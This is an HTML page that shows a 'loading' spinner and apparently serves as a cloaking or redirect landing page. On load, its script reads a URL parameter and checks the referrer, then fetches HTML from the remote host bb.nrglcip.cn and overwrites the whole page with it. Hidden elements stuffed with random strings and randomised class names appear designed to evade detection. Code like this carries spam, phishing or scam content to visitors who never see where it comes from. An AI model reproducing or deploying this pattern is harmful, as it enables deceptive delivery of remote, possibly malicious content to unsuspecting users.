<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .zUmYRn {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .zUmYRn .UHcHUr {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .zUmYRn .content {
            line-height: 50px;
            text-align: center
        }

        .zUmYRn .img {
            width: 100%
        }

        .zUmYRn .qtVoaAlhC {
            text-align: center
        }

        .zUmYRn .qtVoaAlhC span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .zUmYRn .qtVoaAlhC span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .zUmYRn .qtVoaAlhC span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .zUmYRn .qtVoaAlhC span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .zUmYRn .qtVoaAlhC span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .zUmYRn .qtVoaAlhC span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .zUmYRn .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function MxB01GV1mJ(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var qKJAs8I = MxB01GV1mJ('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ qKJAs8I +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ qKJAs8I +".html?a=share";
		}
		
        VsypJy=url+"#"+new Date().getTime();
        VsypJy && function() {
            $.get(VsypJy, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>Dk4p51r9vago80WqtomiWMhCU1T5bUE3AcaPgNmOWX0ah3IZfQbVbhrbselY4XQE1tvHnyt1cA53ujYNxEwujFtQlUtGGCq7UY</div>
<img  src='' style='display:none'>
<p  style='display:none'>lpe9F1uA7QZfDl4ewg08XrOQNnGPgBt295SG98bHv</p>
<h1 style='display:none' >t2SKVkIjHJQm6yl36tMX4E7QQDx73GgjbTvMNt16ty96Ax0Ie4prqeHZgc5mXlpMfR10RUuuF7Y6vICdUTIHtVL8QBe3w58flY</h1><div class="zUmYRn">
    <div class="UHcHUr">
        <div class="qtVoaAlhC">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>KWHK6x9aFEWN8GbnAqrmtlFbgJUHTVejfJxegsPgkRvrhCWBlaj74ePf40l</p>
<a  href='#' style='display:none'>YqEDwlW3TPz0u6vD0V42DU1YUkWKny55d9kWyKeIcoPmt</a>
<p  style='display:none'>KWHK6x9aFEWN8GbnAqrmtlFbgJUHTVejfJxegsPgkRvrhCWBlaj74ePf40l</p>
<img  src='' style='display:none'>
<li style='display:none' >lS6bkWyL3dgTg75Es</li>
<li style='display:none' >lS6bkWyL3dgTg75Es</li>
<b style='display:none' >mPvp0mE5wV95JTmCYeds207Kq7PD2LHjc67qyxb2YWMuIofXS2it1BV</b>
<p  style='display:none'>KWHK6x9aFEWN8GbnAqrmtlFbgJUHTVejfJxegsPgkRvrhCWBlaj74ePf40l</p>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>YqEDwlW3TPz0u6vD0V42DU1YUkWKny55d9kWyKeIcoPmt</a></body>
</html>